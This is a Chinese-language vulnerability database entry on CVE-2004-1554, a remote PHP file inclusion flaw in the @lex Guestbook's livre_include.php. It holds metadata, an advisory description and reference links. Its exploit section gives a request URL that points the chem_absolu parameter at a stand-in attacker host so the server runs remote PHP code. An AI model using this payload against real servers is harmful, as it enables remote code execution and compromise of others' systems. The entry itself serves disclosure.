lexPHPTeam lex Guestbook 远程PHP文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108194 漏洞类型 输入验证
发布时间 2004-09-27 更新时间 2006-09-28
CVE编号 CVE-2004-1554 CNNVD-ID CNNVD-200412-632
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-632
|漏洞详情
lexGuestbook中的livre_include.php存在PHP远程文件包含漏洞。远程攻击者可以通过修改引用了一个含代码的远程web服务器上的URL的chem_absolu参数,来执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/11260/info

A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data.

Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f
|参考资料

来源:BID
名称:11260
链接:http://www.securityfocus.com/bid/11260
来源:XF
名称:@lex-guestbook-file-include(17516)
链接:http://xforce.iss.net/xforce/xfdb/17516
来源:SECTRACK
名称:1011432
链接:http://securitytracker.com/id?1011432
来源:packetstormsecurity.nl
链接:http://packetstormsecurity.nl/0410-exploits/alexPHP.txt
来源:BUGTRAQ
名称:20040926@lexGuestbook(PHP)Includefile
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109635806703748&w=2